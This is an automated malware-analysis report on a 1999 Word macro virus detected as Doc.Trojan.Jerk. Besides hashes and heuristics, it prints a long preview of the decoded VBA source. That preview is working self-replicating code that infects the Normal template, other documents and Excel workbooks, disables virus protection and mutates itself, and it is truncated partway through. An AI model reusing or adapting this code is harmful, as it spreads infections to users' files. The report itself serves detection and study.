Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2634dc2379cf34b4…

MALICIOUS

Office (OLE)

41.0 KB Created: 1999-02-09 18:43:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 0941d930cf2e43ed2db8cca78fdb047d SHA-1: be311e34510f649d0d924831e455e3c55558411b SHA-256: 2634dc2379cf34b46b3a41cb296ffc5f93266028eadf00f76d602faa04a57f08
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Word document containing VBA macros. The macros are designed to infect other Word documents by injecting their code, effectively spreading the malicious functionality. The presence of GetObject calls and ClamAV detections for 'Doc.Trojan.Jerk-7' and 'Doc.Trojan.Jerk-4' further confirm its malicious nature. The primary technique observed is the use of Visual Basic for Application (VBA) to execute malicious code.

Heuristics 3

  • ClamAV: Doc.Trojan.Jerk-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Jerk-7
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29832 bytes
SHA-256: ca1059069d2b01441992439d547dabaade25b0ec03af917fcec107d7d70f13a7
Detection
ClamAV: Doc.Trojan.Jerk-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
































Private Sub Workbook_Deactivate()

On Error Resume Next

Const One = 1, Truex = True, Falsex = False, Zero = 0

Dim OurCode, ThaClass As String
Dim CounterI, CounterJ As Integer
Dim SaveDocument As Boolean

ThaClass = "ThisWorkbook"

OurCode = Application.ThisWorkbook.VBProject.VBComponents.Item(One).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(One).CodeModule.CountOfLines)

Call InfectWord(OurCode)

For CounterI = One To Application.Workbooks.Count
  
  SaveDocument = Falsex
  
  For CounterJ = One To Application.Workbooks.Item(CounterI).VBProject.VBComponents.Count
  
    If Application.Workbooks.Item(CounterI).VBProject.VBComponents.Item(CounterJ).CodeModule.CountOfLines = Zero Then
   
      If Application.Workbooks.Item(CounterI).Path <> "" And Application.Workbooks.Item(CounterI).Saved = Truex And SaveDocument = Falsex Then SaveDocument = Truex
   
      Application.Workbooks.Item(CounterI).VBProject.VBComponents.Item(CounterJ).CodeModule.InsertLines One, OurCode
      
      If Application.Workbooks.Item(CounterI).VBProject.VBComponents.Item(CounterJ).Name = ThaClass Then
        Application.Workbooks.Item(CounterI).VBProject.VBComponents.Item(CounterJ).CodeModule.ReplaceLine One * 33, "Private Sub Workbook_Deactivate()"
      Else
        Application.Workbooks.Item(CounterI).VBProject.VBComponents.Item(CounterJ).CodeModule.ReplaceLine One * 33, "Private Sub Worksheet_Deactivate()"
      End If

    End If
    
  Next CounterJ
  
  If SaveDocument = Truex Then Application.Workbooks.Item(CounterI).Save

Next CounterI

End Sub

Private Sub Document_Close()

On Error Resume Next

Const Truex = True, Falsex = False, Zero = 0, One = 1, wdFormatDocumentx = wdFormatDocument, wdFormatTemplatex = wdFormatTemplate, DoubleDot = ":"

Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim activedoc, normaltmp As Object
Dim ActiveDocName, OurCode As String

If Day(Now) = 14 And Month(Now) > 5 Then MsgBox "I think " & Application.UserName & " is a big stupid jerk!", 0, "Class.Poppy"

Set activedoc = ActiveDocument.VBProject.VBComponents.Item(One)
Set normaltmp = NormalTemplate.VBProject.VBComponents.Item(One)

Randomize

DocumentInfected = Falsex
NormalTemplateInfected = Falsex

If activedoc.CodeModule.CountOfLines <> Zero Then DocumentInfected = Truex
If normaltmp.CodeModule.CountOfLines <> Zero Then NormalTemplateInfected = Truex

Options.VirusProtection = Falsex

If (DocumentInfected = Truex Xor NormalTemplateInfected = Truex) And (ActiveDocument.SaveFormat = wdFormatDocumentx Or ActiveDocument.SaveFormat = wdFormatTemplatex) Then
   
  If DocumentInfected = Truex Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    OurCode = activedoc.CodeModule.Lines(One, activedoc.CodeModule.CountOfLines)
    
    Call AppendLog(OurCode)
    If Int(Rnd * 10 * One) = One * 7 Then Call PolyIt(OurCode)
    Call InfectExcel(OurCode)

    normaltmp.CodeModule.InsertLines One, OurCode
    
    If SaveNormalTemplate = Truex Then NormalTemplate.Save
    
  End If


  ActiveDocName = Mid(ActiveDocument.FullName, 2, One)
  If NormalTemplateInfected = Truex And (ActiveDocName = DoubleDot Or ActiveDocument.Saved = Falsex) Then
  
    SaveDocument = ActiveDocument.Saved
    
    OurCode = normaltmp.CodeModule.Lines(One, normaltmp.CodeModule.CountOfLines)
    
    Call InfectExcel(OurCode)
    
    activedoc.CodeModule.InsertLines One, OurCode
    
    If SaveDocument = Truex Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub


Private Sub PolyIt(ByRef OurCode As String)

On Error Resume Next

Const VarCount = 48, UpperLimit = 15, LowerLimit = 5, Asc
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.